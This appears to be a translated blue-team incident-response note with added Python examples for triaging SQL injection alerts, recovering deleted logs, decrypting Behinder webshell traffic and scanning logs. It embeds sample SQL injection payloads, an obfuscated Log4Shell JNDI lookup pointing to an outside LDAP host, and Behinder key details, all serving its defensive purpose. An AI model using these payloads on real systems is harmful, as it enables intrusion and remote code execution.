HW notes (II)
2022-07-07 03:48:00 【H0ne】
Types of alerts seen during HW
Web attacks: information disclosure, weak passwords, XSS, SQL injection, file upload, file inclusion, webshell, command execution, XXE
Threat intelligence: remote-control trojans (RATs), mining trojans, ransomware, botnets, black-market (underground) tools
SQL injection / webshell: how to tell a real attack from noise
Judge by the payload. A normal business request carries a long SQL statement that calls no sensitive functions; the payload in an injection request body is usually short and contains sensitive functions such as sleep or updatexml (likewise benchmark, extractvalue, load_file). Confirm against the response where you can: a time-based payload that really fired shows up as a delayed response, an error-based one as a database error echoed back.
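The heuristic above, written out as a small triage function. This is an added illustration, not code from the original notes: the list of sensitive functions, the structural tells and the 200-character cutoff are my assumptions and should be tuned to the site's own SQL, and the request bodies are constructed samples rather than real alert data.

```python
import re

# Functions that legitimate business SQL almost never calls but that blind /
# error-based injection payloads rely on (MySQL, PostgreSQL, MSSQL variants).
SENSITIVE_FUNCS = re.compile(
    r"\b(sleep|benchmark|updatexml|extractvalue|load_file|xp_cmdshell|"
    r"pg_sleep|waitfor\s+delay)\b",
    re.IGNORECASE,
)

# Structural tells: a quote followed by a tautology, comment-outs, UNION SELECT,
# or a stacked statement after a semicolon.
INJECTION_SHAPES = re.compile(
    r"(?:'|\")\s*(?:or|and)\s+[^=]{1,10}="          # ' OR 1=1 / ' OR '1'='1
    r"|--[\s-]|/\*"                                  # comment out the tail
    r"|\bunion\s+(?:all\s+)?select\b"                # UNION-based extraction
    r"|;\s*(?:drop|update|delete|insert|exec)\b",    # stacked query
    re.IGNORECASE,
)


def triage_request(body, max_payload_len=200):
    """Score one request body / query string the way the note describes:
    a short payload carrying sensitive functions is far more likely to be a
    real injection attempt than a long, function-free business statement."""
    funcs = sorted({m.group(1).lower() for m in SENSITIVE_FUNCS.finditer(body)})
    shape = INJECTION_SHAPES.search(body) is not None
    short = len(body) <= max_payload_len
    score = 0
    if funcs:
        score += 2                      # strongest signal in the note
    if shape:
        score += 1
    if short and (funcs or shape):
        score += 1                      # short + suspicious = hand-crafted payload
    if score >= 3:
        verdict = "likely_attack"
    elif score >= 1:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "score": score, "functions": funcs, "length": len(body)}


# Constructed samples (not captured traffic): one normal business query and
# three injection payloads as they would appear in an alert's request body.
SAMPLES = {
    "business": ("SELECT o.id, o.total, c.name FROM orders o JOIN customers c "
                 "ON c.id = o.customer_id WHERE o.status = 'shipped' "
                 "AND o.created_at >= '2022-07-01' ORDER BY o.created_at DESC LIMIT 50"),
    "time_based": "id=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -",
    "error_based": "id=1 and updatexml(1,concat(0x7e,(select user()),0x7e),1)",
    "tautology": "username=admin' OR '1'='1&password=x",
}


def triage_all(samples=SAMPLES):
    """Verdict per sample name; handy for batch-checking exported alert bodies."""
    return {name: triage_request(body)["verdict"] for name, body in samples.items()}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:12s} {triage_request(body)}")
```

The tautology sample scores lower than the two function-based payloads on purpose: it is the function call that the note treats as the decisive signal, and a quote-plus-OR pattern without one still deserves a look but is not proof on its own.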
Traffic side / host side: how to rule out false positives
Attacks come from three directions: network, host and application. On the network side it is traffic, so mainly analyze the alerts from the security appliances; on the host side look at which commands were executed and whether files were uploaded; on the application side check the WAF and firewall.
Emergency response workflow
First determine whether the alert is a false positive; if it is not, isolate the host.
Collect information: customer details and details of the infected host, including samples.
Determine the type: is it a security incident at all, and of what kind (ransomware, mining, network outage, DDoS, etc.).
In-depth analysis: log analysis, process analysis, startup-item (persistence) analysis, sample analysis.
If the logs were deleted: check whether a full-traffic capture device is deployed out-of-band and review the packets in Wireshark; check the log server; check whether a process still holds the deleted log file open. On Linux a deleted file stays readable for as long as a process has it open, and the symlink under /proc/<pid>/fd shows the old path marked "(deleted)"; find that symlink from the process details and copy the log back out.
Cleanup and remediation: kill the process, delete the files, apply patches, or repair the tampered files.
Write the report.
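The "logs were deleted" step, as an added Python example that is not part of the original notes. On Linux an unlinked file that a process still holds open is readable through /proc/<pid>/fd/<n>, and readlink on that entry reports the old path with a " (deleted)" suffix (the same files lsof +L1 lists). The demo function replays the scenario inside its own process; the log line and file name are constructed, and reading another process's descriptors requires the same uid or root.

```python
import os
import tempfile

DELETED_SUFFIX = " (deleted)"


def find_deleted_open_files(pid):
    """Return [(fd, original_path), ...] for files that <pid> still holds open
    after they were unlinked. The kernel keeps the inode alive while a
    descriptor references it, and readlink on /proc/<pid>/fd/<n> reports the
    old path with a ' (deleted)' suffix."""
    fd_dir = f"/proc/{pid}/fd"
    found = []
    for name in os.listdir(fd_dir):
        try:
            target = os.readlink(os.path.join(fd_dir, name))
        except OSError:
            continue  # descriptor closed between listdir and readlink
        if target.endswith(DELETED_SUFFIX):
            found.append((int(name), target[:-len(DELETED_SUFFIX)]))
    return found


def recover_deleted_file(pid, fd, dest):
    """Copy the unlinked file's content back out through /proc; returns bytes
    written. Opening /proc/<pid>/fd/<n> opens the inode afresh, so the owning
    process's own file offset is not disturbed."""
    total = 0
    with open(f"/proc/{pid}/fd/{fd}", "rb") as src, open(dest, "wb") as dst:
        while True:
            chunk = src.read(64 * 1024)
            if not chunk:
                break
            dst.write(chunk)
            total += len(chunk)
    return total


def recover_deleted_logs(pid, out_dir, name_hint="log"):
    """Recover every deleted-but-open file of <pid> whose name contains
    name_hint. Returns {original_path: recovered_copy_path}."""
    recovered = {}
    for fd, path in find_deleted_open_files(pid):
        if name_hint not in os.path.basename(path):
            continue
        dest = os.path.join(out_dir, os.path.basename(path) + ".recovered")
        recover_deleted_file(pid, fd, dest)
        recovered[path] = dest
    return recovered


def demo_roundtrip():
    """Replay the scenario inside this process: a 'daemon' handle keeps
    access.log open, the 'attacker' rm's it, and we pull it back via /proc.
    Returns the recovered text (constructed sample line, not real traffic)."""
    sample = '10.0.0.5 - - [07/Jul/2022:03:40:01 +0800] "GET /.env HTTP/1.1" 404 162\n'
    with tempfile.TemporaryDirectory() as workdir:
        path = os.path.realpath(os.path.join(workdir, "access.log"))
        with open(path, "w") as f:
            f.write(sample)
        with open(path, "rb"):                     # the daemon's still-open handle
            os.unlink(path)                        # the attacker's rm
            recovered = recover_deleted_logs(os.getpid(), workdir)
            with open(recovered[path]) as copy:
                return copy.read()


if __name__ == "__main__":
    print(demo_roundtrip(), end="")
```

Against a real host you would pass the web server's or syslog daemon's PID instead of os.getpid(); once the daemon is restarted or the descriptor is closed the inode is gone, so do this before any cleanup.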
Seven-layer network model
OSI model: physical, data link, network, transport, session, presentation, application
TCP/IP (4 layers): network access (link), internet, transport, application
Trojans and virus outbreaks (e.g. worms): how to handle them
1. Establish the scope of the attack
2. Dig out the attack traces
3. Analyze the samples
4. Find and eradicate backdoors and trojan files
Also check CPU usage and the logs alongside the above.
Log4j vulnerability
Log4j (Log4Shell, CVE-2021-44228) is a JNDI injection: a logged string of the form ${jndi:ldap://...} makes the application fetch and load an attacker-controlled object, so JNDI is the springboard to a reverse shell.
Behinder (冰蝎) found: how to determine what the uploaded webshell was used for
It depends mainly on the Behinder version: 2.0 and 3.0 encrypt traffic differently, and 3.0 is the common one. After finding a Behinder shell, look at the session and check for MD5-derived key material: 2.0 negotiates a random key per session and stores it server-side in the session, while 3.0 uses a fixed key, the first 16 characters of the MD5 of the connection password, so a 3.0 shell's traffic can be decrypted offline once the password is known or guessed.
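Added example, not code from the original notes or from the Behinder project: deriving the 3.0 key from the connection password and decoding the PHP shell's fallback cipher (used when the openssl extension is missing: base64, then XOR of byte i with key[(i+1)&15]), which is enough to test candidate passwords against a captured POST body offline. The default password rebeyond and its key are the ones shipped in the Behinder 3.0 server shells; the sample body is constructed here, and the AES path used when openssl is present needs a crypto library and is not covered.

```python
import base64
import hashlib
import re

# What a decrypted Behinder command looks like: the shell splits on '|' and
# hands the second part to eval, so a correct key yields printable func|params.
PLAINTEXT_SHAPE = re.compile(rb"[A-Za-z_][A-Za-z0-9_]*\|[\t\n\r\x20-\x7e]*")


def behinder3_key(password):
    """Behinder 3.0 server shells carry a hard-coded 16-byte key: the first
    16 hex characters of md5(connection password). No per-session negotiation."""
    return hashlib.md5(password.encode()).hexdigest()[:16].encode()


def xor_transform(data, key):
    """The PHP shell's fallback cipher when the openssl extension is missing:
    byte i is XORed with key[(i + 1) & 15]. XOR is its own inverse."""
    return bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(data))


def encode_fallback(plaintext, key):
    """Client side: XOR, then base64 (the body that lands in the HTTP POST)."""
    return base64.b64encode(xor_transform(plaintext, key)).decode()


def decode_fallback(body, key):
    """Server side / analyst side: base64-decode, then XOR back."""
    return xor_transform(base64.b64decode(body), key)


def guess_password(body, candidates):
    """Offline check on a captured body: try candidate connection passwords
    and return the first whose key decodes to well-formed func|params text."""
    for pw in candidates:
        plaintext = decode_fallback(body, behinder3_key(pw))
        if PLAINTEXT_SHAPE.fullmatch(plaintext):
            return pw
    return None


# Constructed sample: what a Behinder 3.0 client using the default password
# would POST on the no-openssl path. Not a real capture.
SAMPLE_COMMAND = b"eval|phpinfo();"
SAMPLE_BODY = encode_fallback(SAMPLE_COMMAND, behinder3_key("rebeyond"))


if __name__ == "__main__":
    print("default key:", behinder3_key("rebeyond").decode())
    print("guessed    :", guess_password(SAMPLE_BODY, ["admin", "rebeyond"]))
    print("decoded    :", decode_fallback(SAMPLE_BODY, behinder3_key("rebeyond")))
```

The same key-derivation function is what you would feed to an AES-128 decrypt of a 3.0 body captured from a host that does have openssl; for a 2.0 shell there is no fixed key to derive, you have to pull the negotiated key out of the server's session store or the key-exchange response.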
Linux and Windows incident response: mainly the troubleshooting approach and the commands
Linux approach: source code, log analysis, and system information analysis. Scan with D盾 (D Shield) for webshells, then diff the source tree against a clean copy to find the modified files. Logs divide into network logs and system logs: search the network (web) logs mainly with find and grep, and read login history from the system logs with last. For system information, the customer usually uploads a collection script and you run it; if there is no script, use the history command, check the sensitive directories, and view the port information.
Windows: concentrate on accounts, event logs and port queries; the same as Linux in essentials, differing only in details.
Deployment mode of Tianyan (天眼)
Out-of-band (bypass) deployment: the switch mirrors traffic to it through port mirroring (SPAN), so it sees the traffic without sitting inline.
Successful log analysis cases
Common logs, whether network or system logs, are all about numbers: a large number of 404s, or a large number of Windows event 4625 (failed logon), each means something. Work out what the intruder was doing and how they got in, and confirm by matching signature strings. On Linux filter with grep and egrep; on Windows use Log Parser.
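The counting-and-signature approach above, together with the Log4j indicator from the earlier section, as an added Python example that is not part of the original notes. It tallies status codes per IP over constructed access-log lines, groups Windows 4625 failed-logon events per source and account from a constructed Log Parser-style CSV export, and unwraps nested Log4j lookups before matching ${jndi: so that ${${lower:j}ndi:... and percent-encoded forms are not missed by a plain grep. The thresholds, the log formats and the CSV column names are assumptions.

```python
import csv
import io
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache/Nginx combined-format access log, constructed for this example.
ACCESS_LOG = """\
10.0.0.5 - - [07/Jul/2022:03:40:01 +0800] "GET /phpmyadmin/ HTTP/1.1" 404 162 "-" "python-requests/2.27"
10.0.0.5 - - [07/Jul/2022:03:40:02 +0800] "GET /.env HTTP/1.1" 404 162 "-" "python-requests/2.27"
10.0.0.5 - - [07/Jul/2022:03:40:03 +0800] "GET /admin/ HTTP/1.1" 404 162 "-" "python-requests/2.27"
10.0.0.5 - - [07/Jul/2022:03:40:09 +0800] "POST /upload.php HTTP/1.1" 200 87 "-" "python-requests/2.27"
192.168.1.20 - - [07/Jul/2022:03:41:10 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Jul/2022:03:42:00 +0800] "GET /api/search?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fa%7D HTTP/1.1" 200 44 "-" "Mozilla/5.0"
"""

# Windows Security log exported as CSV (Log Parser style), constructed.
WIN_SECURITY_CSV = """\
EventID,TimeGenerated,TargetUserName,IpAddress
4625,2022-07-07 03:30:01,administrator,10.0.0.9
4625,2022-07-07 03:30:02,administrator,10.0.0.9
4625,2022-07-07 03:30:03,administrator,10.0.0.9
4625,2022-07-07 03:30:04,administrator,10.0.0.9
4624,2022-07-07 03:30:05,administrator,10.0.0.9
4625,2022-07-07 03:35:00,alice,10.0.0.21
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
# Log4j lookups attackers nest to hide the literal string 'jndi'.
LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def parse_access(text):
    """Yield one dict per parseable line; unparseable lines are skipped."""
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            yield m.groupdict()


def status_by_ip(text):
    """{ip: Counter({status: n})}: the 'it's all about numbers' view of the log."""
    table = defaultdict(Counter)
    for rec in parse_access(text):
        table[rec["ip"]][rec["status"]] += 1
    return table


def noisy_ips(text, status="404", threshold=3):
    """IPs that produced >= threshold responses with the given status (scanners)."""
    return sorted(ip for ip, c in status_by_ip(text).items() if c[status] >= threshold)


def unwrap_lookups(value, rounds=10):
    """Resolve nested lookups innermost-first so ${${lower:j}ndi:...} and
    ${${::-j}ndi:...} become ${jndi:...}."""
    for _ in range(rounds):
        new = LOOKUP_CASE.sub(lambda m: m.group(1).lower(), value)
        new = LOOKUP_DEFAULT.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value


def signature_hits(text):
    """(ip, field, signature) for each request field carrying a JNDI lookup,
    checked after URL-decoding and lookup unwrapping."""
    hits = []
    for rec in parse_access(text):
        for field in ("path", "referer", "ua"):
            value = unwrap_lookups(unquote(rec.get(field) or ""))
            if JNDI.search(value):
                hits.append((rec["ip"], field, "log4shell_jndi"))
    return hits


def failed_logon_bursts(csv_text, threshold=3):
    """Group 4625 (failed logon) by (source IP, account); flag when a 4624
    (successful logon) for the same pair follows the burst: a brute force
    that worked. Rows are assumed to be in time order."""
    failed = Counter()
    succeeded = set()
    for row in csv.DictReader(io.StringIO(csv_text)):
        key = (row["IpAddress"], row["TargetUserName"])
        if row["EventID"] == "4625":
            failed[key] += 1
        elif row["EventID"] == "4624" and failed[key] >= threshold:
            succeeded.add(key)
    return {k: {"failed": n, "success_after": k in succeeded}
            for k, n in failed.items() if n >= threshold}


if __name__ == "__main__":
    print("404 scanners  :", noisy_ips(ACCESS_LOG))
    print("signature hits:", signature_hits(ACCESS_LOG))
    print("logon bursts  :", failed_logon_bursts(WIN_SECURITY_CSV))
```

The 4625-then-4624 pairing is the check that turns "lots of failed logons" into "and one of them succeeded", which is the line between a noisy scan and a compromised account.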
How to trace the attacker and build an attacker profile
Objectives: gaining access, stealing data, exploiting the foothold for profit, DDoS, etc.
Infrastructure: proxy IPs, jump hosts, C2 servers, etc.
Techniques: spear-phishing email, web penetration, watering-hole attacks, source penetration, social engineering, etc.
Clues: IP geolocation, tracking handles/IDs, website URLs
Difference between HTTP and TCP
TCP sits at layer 4 (transport); HTTP sits at layer 7 (application).
HTTP is a simple request-response protocol; TCP is a connection-oriented, reliable, byte-stream transport-layer protocol. HTTP runs on top of TCP.
Tianyan (天眼) search syntax
The && operator is written doubled; the keyword AND is written in capitals.
The fields sip and dip mean source IP and destination IP; the field name is followed by a colon and the value to match, e.g. sip:10.0.0.5 AND dip:10.0.0.8 (addresses here are placeholders).
Tianyan: based on network traffic and endpoint EDR logs, it uses threat intelligence, a rules engine, file sandboxing (virtual execution) and machine learning to accurately discover intrusions by known advanced attacks and unknown new attacks against the hosts and servers in the network.
NGSOC (security situational awareness and security operations): built on a big-data platform, it collects massive multi-source, heterogeneous logs and uses correlation analysis, machine learning, threat intelligence and other techniques to help government and enterprise customers continuously monitor their network security posture and move from "passive defense" to "active defense".
Tianyan only analyzes traffic; NGSOC closes the loop from detection to management and response.